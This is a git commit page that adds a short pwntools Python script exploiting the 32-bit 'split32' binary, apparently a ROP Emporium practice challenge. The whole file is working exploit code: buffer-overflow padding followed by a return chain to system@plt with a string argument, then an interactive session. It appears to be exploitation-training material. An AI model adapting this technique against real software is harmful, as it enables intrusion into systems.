exploit for 32-bit split binary

AravGarg · Mar 28, 2020 · 044770a · 044770a
1 parent 6f86c99
commit 044770a
Showing 1 changed file with 18 additions and 0 deletions.
diff --git a/split32.py b/split32.py
@@ -0,0 +1,18 @@
+from pwn import *
+target=process('./split32')
+
+string=0x0804A030
+system_plt=0x08048430
+
+#ropchain
+
+#initial payload
+payload="A"*44
+
+#final payload with bogus return address
+payload+=p32(system_plt)
+payload+=p32(0xdeadbeef)
+payload+=p32(string)
+
+target.sendline(payload)
+target.interactive()